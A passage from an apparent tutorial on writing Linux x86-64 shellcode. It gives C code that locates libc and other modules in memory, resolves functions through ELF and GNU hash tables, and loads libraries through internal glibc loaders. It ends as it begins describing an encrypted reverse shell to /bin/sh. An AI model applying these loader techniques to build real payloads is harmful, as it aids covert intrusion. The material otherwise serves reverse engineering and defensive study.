    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      got = elf_get_dyn(base, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.3 Debug Structure (DT_DEBUG)

The link_map is also available via the debug type or DT_DEBUG.

struct r_debug {
    int32_t r_version;          /* version, always one */
    struct link_map * r_map;    /* list of loaded libraries */
    void (*r_brk)(void);        /* marker function address */
    int32_t r_state;            /* zero if the state of r_map is consistent */
    uintptr_t r_ldbase;         /* linker base address (this is where the linker was loaded after relocation) */
};

The following code shows how to resolve using DT_DEBUG. It’s essentially the same as get_module_handle2 that uses DT_PLTGOT. In fact, it might be possible to use the same function for both types by treating each structure as an array of 64-bit pointers: r_version is padded to 8 bytes, which places r_map at index 1, the same position the link_map occupies in the GOT.

void *get_module_handle3(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *dbg;
    void            *addr=NULL, *base;
    struct r_debug  *debug;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();    
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain debug structure
      dbg = elf_get_dyn(base, DT_DEBUG);
      if(dbg != NULL) {
        debug = (struct r_debug*)dbg->d_un.d_ptr;
        map   = (struct link_map *)debug->r_map;
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}
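
To check the result of get_module_handle3 from an ordinary test program, the same walk can be written against the declarations in link.h. This sketch assumes a dynamically linked program, where the linker defines the _DYNAMIC symbol, so there's no need to find the base of the host first. find_module is a hypothetical name, and the static assertion just confirms the layout that would let one pointer-indexed lookup serve both DT_DEBUG and DT_PLTGOT.

```c
#include <assert.h>
#include <elf.h>
#include <link.h>
#include <stddef.h>
#include <string.h>

// Defined by the linker for dynamically linked programs. glibc's link.h
// already declares it; repeating the declaration is harmless.
extern ElfW(Dyn) _DYNAMIC[];

// r_map sits one pointer into r_debug, the same slot as GOT[1].
_Static_assert(offsetof(struct r_debug, r_map) == sizeof(void *),
               "r_map is expected at pointer index 1");

// Walk the link_map list reached through DT_DEBUG and return the load
// address of the first object whose name contains module, or NULL.
// Hypothetical helper, for illustration only.
static void *find_module(const char *module) {
    ElfW(Dyn)       *dyn;
    struct r_debug  *dbg = NULL;
    struct link_map *map;

    assert(module != NULL);

    // 1. locate DT_DEBUG in our own dynamic section
    for (dyn = _DYNAMIC; dyn->d_tag != DT_NULL; dyn++) {
        if (dyn->d_tag == DT_DEBUG) {
            dbg = (struct r_debug *)dyn->d_un.d_ptr;
            break;
        }
    }
    // the loader leaves the pointer at zero if it never filled it in
    if (dbg == NULL) return NULL;

    // 2. search the chain of loaded objects by name
    for (map = dbg->r_map; map != NULL; map = map->l_next) {
        if (map->l_name != NULL && strstr(map->l_name, module) != NULL) {
            return (void *)map->l_addr;
        }
    }
    return NULL;
}
```

On a glibc system, find_module("libc") should return an address that starts with the ELF magic, which is a quick way to confirm the shellcode version found the same base.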

6.4 Thread Local Storage (TLS)

herm1t writes in Highway to libc that a pointer to TLS memory for glibc can be found in the Thread Control Block (TCB) accessible via the gs register on 32-bit systems or the fs register on 64-bit systems. If you look at the value of fs on a 64-bit system, it appears to be empty. Accessing fs will still return information from the TCB, but at least on my 64-bit system, it did not contain an address for TLS as expected. While the approach described by herm1t didn’t work on this system, there are some interesting addresses at negative offsets. Read A Deep dive into (implicit) Thread Local Storage for more detailed information on TLS.

  fs-8*7  : main_arena                - heap memory
  fs-8*10 : _nl_C_LC_CTYPE_class
  fs-8*11 : _nl_C_LC_CTYPE_toupper
  fs-8*12 : _nl_C_LC_CTYPE_tolower
  fs-8*14 : _res
  fs-8*15 : _nl_global_locale

The following code will use _nl_C_LC_CTYPE_class to locate the base address of libc.so on my own system, but may not work elsewhere without modification.

void *get_base2(void) {
    uint64_t *fs, base;
    
    // retrieve the address of _nl_C_LC_CTYPE_class
    asm ("mov %%fs:0xffffffffffffffb0,%%rax":"=a"(fs));
    
    base = (uint64_t)fs;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

Another approach uses only the pointer to the TCB. It is a brute-force method that works for both dynamically and statically linked binaries. Again, this was tested on my system and may require modification. It works by first obtaining a file descriptor to /dev/random opened for writing. If write succeeds when given the address we want to read as its source buffer, the page is readable, and we then check it for the ELF file header.

void *get_base3(void) {
    uint64_t base;
    int      fd, str[4];
    
    asm ("mov %%fs:0,%%rax" : "=a" (base));
    
    // align down
    base &= -4096;
    
    // "/dev/random"
    str[0] = 0x7665642f;
    str[1] = 0x6e61722f;
    str[2] = 0x006d6f64;

    fd = _open((char*)str, O_WRONLY, 0);
    
    for(;;) {
      if(_write(fd, (char*)base, 4) == 4) {
        if (*(uint32_t*)base == 0x464c457fUL) {
          break;
        }
      }
      base -= 4096;
    }
    _close(fd);
    
    return (void*)base;
}
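The probing trick in get_base3 can be isolated and bounded. The sketch below is an assumption-laden variant, not the author's code: it uses an anonymous pipe instead of /dev/random, reads the probed bytes back from the pipe instead of dereferencing the address, and stops after max_pages. The names probe_read32, page_is_readable and find_elf_base are hypothetical, and the magic constant assumes a little-endian machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

#define PAGE_SIZE 4096UL
#define ELF_MAGIC 0x464c457fUL /* "\x7fELF" as a little-endian 32-bit word */

/* Try to push 4 bytes at addr through the pipe. write() fails with EFAULT
   when the source page is not readable, so no signal handler is needed. */
static int probe_read32(const int pfd[2], const void *addr, uint32_t *out) {
    if (write(pfd[1], addr, sizeof *out) != (ssize_t)sizeof *out)
        return 0;
    return read(pfd[0], out, sizeof *out) == (ssize_t)sizeof *out;
}

/* Returns 1 if 4 bytes at addr can be read, 0 otherwise. */
int page_is_readable(const void *addr) {
    int      pfd[2], ok;
    uint32_t tmp;

    if (pipe(pfd) != 0) return 0;
    ok = probe_read32(pfd, addr, &tmp);
    close(pfd[0]);
    close(pfd[1]);
    return ok;
}

/* Scan downwards, one page at a time, for a page that begins with the
   ELF magic. Unreadable pages are skipped. Gives up after max_pages. */
void *find_elf_base(const void *start, size_t max_pages) {
    uintptr_t base = (uintptr_t)start & ~(uintptr_t)(PAGE_SIZE - 1);
    void     *found = NULL;
    uint32_t  word;
    int       pfd[2];

    if (pipe(pfd) != 0) return NULL;
    for (size_t i = 0; i < max_pages && base != 0; i++, base -= PAGE_SIZE) {
        if (probe_read32(pfd, (const void *)base, &word) && word == ELF_MAGIC) {
            found = (void *)base;
            break;
        }
    }
    close(pfd[0]);
    close(pfd[1]);
    return found;
}
```

Reading the word back from the pipe means the scan never touches memory it has not already proven readable, at the cost of two system calls per page.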

7. Resolving Address of Functions

At this point we should have the base address of host process and the base address of libc. However, even if you only managed to retrieve the base address of libc, that would be sufficient to do everything else.

7.1 ELF Hash Table (DT_HASH)

Instead of repeating information already available, let me refer you to a couple of posts about this.

  1. Hashin’ the elves by herm1t
  2. ELF: symbol lookup via DT_HASH by FLAPENGUIN

The following code is derived from those two posts.

uint32_t elf_hash(const uint8_t *name) {
    uint32_t h = 0, g;
    
    while (*name) {
      h = (h << 4) + *name++;
      g = h & 0xf0000000;
      if (g)
        h ^= g >> 24;
      h &= ~g;
    }
    return h;
}

void *elf_lookup(
  const char *name, 
  uint32_t *hashtab, 
  Elf64_Sym *sym, 
  const char *str) 
{
    uint32_t  idx;
    uint32_t  nbuckets = hashtab[0];
    uint32_t* buckets  = &hashtab[2];
    uint32_t* chains   = &buckets[nbuckets];
    
    for(idx = buckets[elf_hash(name) % nbuckets]; 
        idx != 0; 
        idx = chains[idx]) 
    {
      // does string match for this index?
      if(!_strcmp(name, sym[idx].st_name + str))
        // return address of function
        return (void*)sym[idx].st_value;
    }
    return NULL;
}
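To make the bucket and chain layout concrete, here is a minimal sketch that runs the same lookup over a tiny hand-built table. The symbol names and table contents are made up for illustration, and a plain array of names stands in for the Elf64_Sym and string tables; sysv_hash and sysv_lookup_index are hypothetical names.

```c
#include <stdint.h>
#include <string.h>

/* The System V ELF hash, same algorithm as elf_hash above. */
uint32_t sysv_hash(const char *name) {
    uint32_t h = 0, g;

    while (*name) {
        h = (h << 4) + (uint8_t)*name++;
        g = h & 0xf0000000;
        if (g) h ^= g >> 24;
        h &= ~g;
    }
    return h;
}

/* Index 0 is the reserved null symbol, as in a real symbol table. */
const char *const demo_names[] = { "", "a", "b", "ab" };

/* Layout: nbucket, nchain, bucket[nbucket], chain[nchain].
   nchain equals the number of symbol table entries. */
const uint32_t demo_hashtab[] = {
    2, 4,        /* nbucket, nchain */
    2, 1,        /* bucket[0] -> "b", bucket[1] -> "a" */
    0, 0, 3, 0   /* chain[2] -> "ab" because "b" and "ab" share bucket 0 */
};

/* Returns the symbol index for name, or 0 if it is not in the table. */
uint32_t sysv_lookup_index(const char *name,
                           const uint32_t *hashtab,
                           const char *const *names) {
    uint32_t        nbucket = hashtab[0];
    const uint32_t *bucket  = &hashtab[2];
    const uint32_t *chain   = &bucket[nbucket];

    for (uint32_t i = bucket[sysv_hash(name) % nbucket]; i != 0; i = chain[i]) {
        if (strcmp(name, names[i]) == 0)
            return i;
    }
    return 0;
}
```

Because nchain is the symbol count, hashtab[1] is also a convenient way to learn how many entries the dynamic symbol table holds.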

7.2 GNU Hash Table (DT_GNU_HASH)

In June 2006, support for the DT_GNU_HASH table was added to the GNU toolchain, and this apparently speeds up searches by 50%. The hash function was posted to comp.lang.c all the way back in 1991 by Dan Bernstein. Deroko from ARTeam and FLAPENGUIN have both written about the table format. The following code is derived from the post by FLAPENGUIN.

#define ELFCLASS_BITS 64

uint32_t gnu_hash(const uint8_t *name) {
    uint32_t h = 5381;

    for(; *name; name++) {
      h = (h << 5) + h + *name;
    }
    return h;
}

struct gnu_hash_table {
    uint32_t nbuckets;
    uint32_t symoffset;
    uint32_t bloom_size;
    uint32_t bloom_shift;
    uint64_t bloom[1];
    uint32_t buckets[1];
    uint32_t chain[1];
};

void* gnu_lookup(
    const char* name,          /* symbol to look up */
    const void* hash_tbl,      /* hash table */
    const Elf64_Sym* symtab,   /* symbol table */
    const char* strtab         /* string table */
) {
    struct gnu_hash_table *hashtab = (struct gnu_hash_table*)hash_tbl;
    const uint32_t  namehash    = gnu_hash(name);

    const uint32_t  nbuckets    = hashtab->nbuckets;
    const uint32_t  symoffset   = hashtab->symoffset;
    const uint32_t  bloom_size  = hashtab->bloom_size;
    const uint32_t  bloom_shift = hashtab->bloom_shift;
    
    const uint64_t* bloom       = (void*)&hashtab->bloom;
    const uint32_t* buckets     = (void*)&bloom[bloom_size];
    const uint32_t* chain       = &buckets[nbuckets];

    uint64_t word = bloom[(namehash / ELFCLASS_BITS) % bloom_size];
    uint64_t mask = 0
        | (uint64_t)1 << (namehash % ELFCLASS_BITS)
        | (uint64_t)1 << ((namehash >> bloom_shift) % ELFCLASS_BITS);

    if ((word & mask) != mask) {
        return NULL;
    }

    uint32_t symix = buckets[namehash % nbuckets];
    if (symix < symoffset) {
        return NULL;
    }

    /* Loop through the chain. */
    for (;;) {
        const char* symname = strtab + symtab[symix].st_name;
        const uint32_t hash = chain[symix - symoffset];        
        if ((namehash|1) == (hash|1) && _strcmp(name, symname) == 0) {
            return (void*)symtab[symix].st_value;
        }
        if(hash & 1) break;
        symix++;
    }
    return 0;
}
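The chain comparison deserves a closer look. Each chain entry stores the symbol's hash with the lowest bit repurposed as an end-of-chain marker, so the comparison has to ignore that bit. In C, == binds more tightly than |, which is why the masked values need their own parentheses. A minimal sketch with hypothetical helper names:

```c
#include <stdint.h>

/* Same algorithm as gnu_hash above, taking a plain C string. */
uint32_t gnu_hash_str(const char *name) {
    uint32_t h = 5381;

    for (; *name; name++)
        h = (h << 5) + h + (uint8_t)*name;
    return h;
}

/* Compare a name hash with a chain entry, ignoring the low bit. */
int gnu_chain_match(uint32_t namehash, uint32_t chainval) {
    return (namehash | 1) == (chainval | 1);
}

/* The low bit of a chain entry is set on the last symbol of a bucket. */
int gnu_chain_last(uint32_t chainval) {
    return (chainval & 1) != 0;
}
```

A match on the masked hash is only a hint. The string comparison that follows it in gnu_lookup is still required to rule out collisions.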

7.3 Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)

The following function works similarly to GetProcAddress on Windows and dlsym on Linux. Given the base address of a module and the name of a function, it looks up the virtual address of the function using the hash table.

void *get_proc_address(void *module, void *name) {
    Elf64_Dyn  *symtab, *strtab, *hash;
    Elf64_Sym  *syms;
    char       *strs;
    void       *addr = NULL;
    
    // 1. obtain pointers to string and symbol tables
    strtab = elf_get_dyn(module, DT_STRTAB);
    symtab = elf_get_dyn(module, DT_SYMTAB);
    
    if(strtab == NULL || symtab == NULL) return NULL;
    
    // 2. load virtual address of string and symbol tables
    strs = (char*)strtab->d_un.d_ptr;
    syms = (Elf64_Sym*)symtab->d_un.d_ptr;
    
    // 3. try obtain the ELF hash table
    hash = elf_get_dyn(module, DT_HASH);
    
    // 4. if we have it, lookup symbol by ELF hash
    if(hash != NULL) {
      addr = elf_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
    } else {
      // if we don't, try obtain the GNU hash table
      hash = elf_get_dyn(module, DT_GNU_HASH);
      if(hash != NULL) {
        addr = gnu_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
      }
    }
    // 5. did we find symbol? add base address and return
    if(addr != NULL) {
      addr = (void*)((uint64_t)module + (uint64_t)addr);
    }
    return addr;
}

This approach requires using the hash table, but in the next example, I’ll show a method similar to what’s used in Windows shellcode.

7.4 Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)

Another way to look up the address of a function is by using the section headers. Given the base of a module, get_proc_address2 obtains the path of the library and passes it to get_proc_address3, which then searches the symbol table using a hash of the function name. get_proc_address3 is primarily for statically linked binaries.

// lookup by hash using the base address of module
void *get_proc_address2(void *module, uint32_t hash) {
    char            *path=NULL;
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    uint64_t        *ptrs, addr;
    struct link_map *map;
    
    if(module == NULL) return NULL;
    
    // 1. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(module, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 2. obtain global offset table
      got = elf_get_dyn(module, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 3. search through link_map for module
        while (map != NULL) {
          // this our module?
          if(map->l_addr == (uint64_t)module) {
            path = map->l_name;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    // not found? exit
    if(path == NULL) return NULL;
    addr = (uint64_t)get_proc_address3(path, hash);
    // symbol not found? don't return the bare module base
    if(addr == 0) return NULL;
    
    return (void*)((uint64_t)module + addr); 
}

// lookup by hash using the path of library (static lookup)
void* get_proc_address3(const char *path, uint32_t hash) {
    int         i, fd, cnt=0;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    Elf64_Sym  *syms=0;
    void       *addr=NULL;
    char       *strs=0;
    uint8_t    *map;
    struct stat fs;
    int         str[8];
    
    // /proc/self/exe
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x652f666c;
    str[3] = 0x00006578;

    // open file
    fd = _open(path == NULL ? (char*)str : path, O_RDONLY, 0);
    if(fd < 0) return NULL;
    // get the size
    if(_fstat(fd, &fs) == 0) {
      // map into memory
      map = (uint8_t*)_mmap(NULL, fs.st_size,  
        PROT_READ, MAP_PRIVATE, fd, 0);
      if(map != MAP_FAILED) {
        ehdr = (Elf64_Ehdr*)map;
        shdr = (Elf64_Shdr*)(map + ehdr->e_shoff);
        // locate static or dynamic symbol table
        for(i=0; i<ehdr->e_shnum; i++) {
          if(shdr[i].sh_type == SHT_SYMTAB ||
             shdr[i].sh_type == SHT_DYNSYM) {
            strs = (char*)(map + shdr[shdr[i].sh_link].sh_offset);
            syms = (Elf64_Sym*)(map + shdr[i].sh_offset);
            cnt  = shdr[i].sh_size/sizeof(Elf64_Sym);
          }
        }
        // loop through string table for function
        for(i=0; i<cnt; i++) {
          // if found, save address
          if(gnu_hash(&strs[syms[i].st_name]) == hash) {
            addr = (void*)syms[i].st_value;
          }
        }
        _munmap(map, fs.st_size);
      }
    }
    _close(fd);
    return addr;
}
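The same section-header walk can be written against the ordinary libc calls with stricter error handling. The sketch below only counts the entries in .dynsym, which is enough to show the checks involved. It assumes a 64-bit ELF file that still has its section headers, and count_dynsyms is a hypothetical helper, not part of the original sources.

```c
#include <elf.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns the number of entries in the SHT_DYNSYM section of the file,
   or -1 if the file cannot be read or has no such section. */
long count_dynsyms(const char *path) {
    long        count = -1;
    struct stat st;
    int         fd = open(path, O_RDONLY);

    if (fd < 0) return -1;                 /* open() fails with -1, not 0 */

    if (fstat(fd, &st) == 0 && (uint64_t)st.st_size >= sizeof(Elf64_Ehdr)) {
        uint64_t size = (uint64_t)st.st_size;
        uint8_t *map  = mmap(NULL, (size_t)size, PROT_READ, MAP_PRIVATE, fd, 0);

        if (map != MAP_FAILED) {           /* mmap() fails with MAP_FAILED */
            const Elf64_Ehdr *ehdr = (const Elf64_Ehdr *)map;

            /* validate the header before trusting any offsets */
            if (memcmp(ehdr->e_ident, ELFMAG, SELFMAG) == 0 &&
                ehdr->e_ident[EI_CLASS] == ELFCLASS64 &&
                ehdr->e_shoff != 0 && ehdr->e_shoff <= size &&
                ehdr->e_shnum <= (size - ehdr->e_shoff) / sizeof(Elf64_Shdr)) {
                const Elf64_Shdr *shdr =
                    (const Elf64_Shdr *)(map + ehdr->e_shoff);

                for (unsigned i = 0; i < ehdr->e_shnum; i++) {
                    if (shdr[i].sh_type == SHT_DYNSYM) {
                        count = (long)(shdr[i].sh_size / sizeof(Elf64_Sym));
                        break;
                    }
                }
            }
            munmap(map, (size_t)size);
        }
    }
    close(fd);
    return count;
}
```

Calling count_dynsyms("/proc/self/exe") inspects the running program, mirroring the default path used by get_proc_address3.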

8. Loading Shared Objects

The normal way to load a shared object and resolve the address of a function is via dlopen and dlsym respectively. Both of these functions are exported by libdl.so – the dynamic linking library. For my build of Debian, libc.so doesn’t use code inside libdl.so because the mechanics of loading libraries and resolving functions are actually within ld.so – the dynamic linker/loader. This loader also doesn’t export or make publicly available either of the functions required, but pointers to the real functions can be found in a read-only shared area of memory called _rtld_global_ro that is exposed via the symbol table. This is a structure defined in /sysdeps/generic/ldsodefs.h that when compiled with SHARED defined will include pointers to the dynamic loading functions.

8.1 __libc_dlopen_mode and __libc_dlsym

Before discussing _rtld_global_ro, note that the symbol table of libc.so contains functions that allow you to dynamically load shared objects without using libdl.so.

user@nostromo:~/hub/shellcode$ readelf /lib/x86_64-linux-gnu/libc-2.24.so -s |grep -i "__libc_dl"
  1165: 000000000011fa60    17 FUNC    GLOBAL DEFAULT   13 __libc_dl_error_tsd@@GLIBC_PRIVATE
  1216: 000000000011f4b0    35 FUNC    GLOBAL DEFAULT   13 __libc_dlclose@@GLIBC_PRIVATE
  2043: 000000000011f440   100 FUNC    GLOBAL DEFAULT   13 __libc_dlsym@@GLIBC_PRIVATE
  2152: 000000000011f3f0    80 FUNC    GLOBAL DEFAULT   13 __libc_dlopen_mode@@GLIBC_PRIVATE

To load libraries, we need to resolve the address of __libc_dlopen_mode and if we want to resolve the address of functions by string, we also need __libc_dlsym. The following code shows how you might load libgnutls.so using a static path.

  void *clib, *gnutls;
  
  // 1. resolve the address of __libc_dlopen_mode in libc.so
  clib = get_module_handle("libc");
  _dl_open = (dl_open_t)get_proc_address(clib, "__libc_dlopen_mode");
  
  // 2. load gnutls
  gnutls = _dl_open("/usr/lib/x86_64-linux-gnu/libgnutls.so", RTLD_LAZY);

Now onto the _rtld_global_ro object that may be of interest to you. The following shows the function pointers for dynamic loading. Depending on the version of glibc, the structure itself can differ in size. I was curious to see if it was possible to find _dl_open using this object in the event __libc_dlopen_mode was not available for any reason.

user@nostromo:~/hub/shellcode$ readelf -s /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 |grep -i "rtld_global_ro"
    25: 0000000000223ca0   376 OBJECT  GLOBAL DEFAULT   16 _rtld_global_ro@@GLIBC_PRIVATE

#ifdef SHARED
  // We add a function table to _rtld_global which is then used to
  //   call the function instead of going through the PLT.  The result
  //   is that we can avoid exporting the functions and we do not jump
  //   PLT relocations in libc.so.
  
  void (*_dl_debug_printf) (const char *, ...)
       __attribute__ ((__format__ (__printf__, 1, 2)));
  
  int (internal_function *_dl_catch_error) (const char **, const char **,
					    bool *, void (*) (void *), void *);
  
  void (internal_function *_dl_signal_error) (int, const char *, const char *,
					      const char *);
  
  void (*_dl_mcount) (ElfW(Addr) frompc, ElfW(Addr) selfpc);
  
  lookup_t (internal_function *_dl_lookup_symbol_x) (const char *,
						     struct link_map *,
						     const ElfW(Sym) **,
						     struct r_scope_elem *[],
						     const struct r_found_version *,
						     int, int,
						     struct link_map *);
                 
  int (*_dl_check_caller) (const void *, enum allowmask);
  
  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,
		     Lmid_t nsid, int argc, char *argv[], char *env[]);
  
  void (*_dl_close) (void *map);
  
  void *(*_dl_tls_get_addr_soft) (struct link_map *);
  
#ifdef HAVE_DL_DISCOVER_OSVERSION
  int (*_dl_discover_osversion) (void);
#endif

You can view the data for a process under GDB if you know the address of _rtld_global_ro.

(gdb) x/40xg 0x7ffff7ffcca0
0x7ffff7ffcca0 <_rtld_global_ro>:     0x0004099000000000  0x00007fffffffe4d9
0x7ffff7ffccb0 <_rtld_global_ro+16>:  0x0000000000000006  0x0000000000001000
0x7ffff7ffccc0 <_rtld_global_ro+32>:  0x0000000000000000  0x00007ffff7fcca30
0x7ffff7ffccd0 <_rtld_global_ro+48>:  0x0000000000000004  0x0000000000000064
0x7ffff7ffcce0 <_rtld_global_ro+64>:  0x0000000100000002  0x0000000000000000
0x7ffff7ffccf0 <_rtld_global_ro+80>:  0x000003030000037f  0x00000000bfebfbff
0x7ffff7ffcd00 <_rtld_global_ro+96>:  0x0000000000000000  0x00007fffffffe390
0x7ffff7ffcd10 <_rtld_global_ro+112>: 0x0000001600000001  0x02100800000406e3
0x7ffff7ffcd20 <_rtld_global_ro+128>: 0xbfebfbff7ffafbbf  0x029c67af00000000
0x7ffff7ffcd30 <_rtld_global_ro+144>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd40 <_rtld_global_ro+160>: 0x0000000000000000  0x0000004e00000006
0x7ffff7ffcd50 <_rtld_global_ro+176>: 0x00000000000003c0  0x000000000034ccf1
0x7ffff7ffcd60 <_rtld_global_ro+192>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd70 <_rtld_global_ro+208>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd80 <_rtld_global_ro+224>: 0x00007ffff7df503c  0x0000000000000000
0x7ffff7ffcd90 <_rtld_global_ro+240>: 0x0000000000000000  0x00007ffff7ffec28
0x7ffff7ffcda0 <_rtld_global_ro+256>: 0x00007ffff7ffa000  0x00007ffff7ffe708
0x7ffff7ffcdb0 <_rtld_global_ro+272>: 0x0000000000000000  0x00007ffff7de9630
0x7ffff7ffcdc0 <_rtld_global_ro+288>: 0x00007ffff7de85d0  0x00007ffff7de8390
0x7ffff7ffcdd0 <_rtld_global_ro+304>: 0x00007ffff7deaa30  0x00007ffff7de2ea0

Using some simple code, we can identify with _dl_addr the addresses that belong to ld-linux.

typedef struct {
  const char *dli_fname;  // File name of defining object.   
  void       *dli_fbase;  // Load address of that object.    
  const char *dli_sname;  // Name of nearest symbol.         
  void       *dli_saddr;  // Exact value of nearest symbol.  
} Dl_info;

typedef int (*dl_addr_t)(
  const void *address, 
  Dl_info *info, 
  struct link_map **mapp, 
  const Elf64_Sym **symbolp);
  
  -------------------------------
    dl_addr_t        _dl_addr;
    void            *clib, *ld;
    uint64_t        *rtld;
    Dl_info          info;
    struct link_map *map;
    const Elf64_Sym *sym;
    int              i;
    
    // 1. resolve the address of _dl_addr in libc.so
    clib = get_module_handle("libc");
    _dl_addr = (dl_addr_t)get_proc_address(clib, "_dl_addr");
    
    // 2. resolve the address of _rtld_global_ro in ld-linux.so
    ld = get_module_handle("ld-linux");
    rtld = (uint64_t*)get_proc_address(ld, "_rtld_global_ro");
    
    // 3. try the first 64 entries
    for(i=0;i<64;i++) {
      if(_dl_addr((void*)rtld[i], &info, &map, &sym)) {
        const char *str = info.dli_sname ? : "N/A";
        printf("[%i] %p : %-10s : %s \n", 
          i, (void*)rtld[i], str, info.dli_fname);
      }
    }

The following shows basic output from the above code.

[28] 0x7f5dde45c03c : N/A        : /lib64/ld-linux-x86-64.so.2 
[32] 0x7ffd6d904000 : LINUX_2.6  : linux-vdso.so.1 
[35] 0x7f5dde450630 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_debug_printf
[36] 0x7f5dde44f5d0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_catch_error
[37] 0x7f5dde44f390 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_signal_error
[38] 0x7f5dde451a30 : _dl_mcount : /lib64/ld-linux-x86-64.so.2  // _dl_mcount
[39] 0x7f5dde449ea0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_lookup_symbol_x
[40] 0x7f5dde452fc0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_check_caller
[41] 0x7f5dde453540 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_open
[42] 0x7f5dde455560 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_close
[43] 0x7f5dde452b40 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_tls_get_addr_soft
[44] 0x7f5dde457b80 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_discover_osversion

In this instance, we know the address of _dl_open will be at _rtld_global_ro + 41*8. It’s certainly possible to call the function, but internally there is a check on where the call originated. _dl_check_caller will determine if the call originated from a valid Dynamic Shared Object (DSO).

// Bit masks for the objects which valid callers can come from to
//   functions with restricted interface.  
enum allowmask {
    allow_libc = 1,
    allow_libdl = 2,
    allow_libpthread = 4,
    allow_ldso = 8
  };

The following snippet from elf/dl-open.c shows where the caller is validated. The check itself is implemented in elf/dl-caller.c.

static void dl_open_worker (void *a) {
  struct dl_open_args *args = a;
  const char *file = args->file;
  int mode = args->mode;
  struct link_map *call_map = NULL;

  // Check whether _dl_open() has been called from a valid DSO.
  if (__check_caller (args->caller_dl_open,
		      allow_libc|allow_libdl|allow_ldso) != 0)
    _dl_signal_error (0, "dlopen", NULL, N_("invalid caller"));

As you can see, only libc.so, libdl.so and ld.so are permitted to load a library. Bypassing this check is trivial, but thankfully not required because libc.so exports __libc_dlopen_mode.

8.2 Parsing /etc/ld.so.conf

A list of shared libraries is stored in /etc/ld.so.cache and a list of trusted paths can be found in /etc/ld.so.conf. If you wanted to map a library into memory without knowing the full path, you could either check each of the entries in the cache or append the name of the library to each of the paths found in the configuration file. For this shellcode, all libraries required are stored in the cache list and dlopen doesn’t require a full path.
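The second option, appending a library name to each configured path, can be sketched as follows. This is a simplified illustration rather than a full parser: it works on configuration text already held in memory, treats only lines that begin with / as directories, and therefore skips comments, blank lines and include directives without following them. candidate_paths is a hypothetical helper name.

```c
#include <stdio.h>
#include <string.h>

/* Build "<dir>/<lib>" for every directory line in conf.
   Returns the number of candidate paths written to out. */
int candidate_paths(const char *conf, const char *lib,
                    char out[][256], int max) {
    int count = 0;

    while (*conf != '\0' && count < max) {
        size_t      len  = strcspn(conf, "\n");  /* length of this line */
        const char *line = conf;
        size_t      n    = len;

        /* trim leading and trailing blanks */
        while (n > 0 && (*line == ' ' || *line == '\t')) { line++; n--; }
        while (n > 0 && (line[n - 1] == ' ' || line[n - 1] == '\t' ||
                         line[n - 1] == '\r')) n--;

        /* only absolute paths are treated as library directories */
        if (n > 0 && line[0] == '/') {
            snprintf(out[count], 256, "%.*s/%s", (int)n, line, lib);
            count++;
        }
        conf += len;
        if (*conf == '\n') conf++;
    }
    return count;
}
```

Each candidate could then be tested with open or passed directly to the loader until one succeeds.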

9. Reverse Shell using SSL/TLS

The reverse shell uses synchronization so that it’s possible to create a subprocess running /bin/sh with stdin, stdout and stderr redirected through anonymous pipes. We then monitor I/O signals on those anonymous pipes and on a TCP socket, which allows us to encrypt and decrypt the traffic using the GnuTLS functions. It is based on epl.c, which does not use any encryption for interacting with /bin/sh.

9.1 Data Table

Since we can’t use any global variables for a PIC, everything is stored on the stack. To manage this data more efficiently, I’ve defined a structure that contains all the pointers to functions and variables for various operations should it be required by other subroutines.

typedef struct _data_t {
    int s;       // socket file descriptor

    union {
      uint64_t hash[64];
      void     *addr[64];
      struct {
        // gnu c library functions
        pipe_t          _pipe;
        fork_t          _fork;
        socket_t        _socket;
        // .... snipped
      };
    } api;
} data_t;
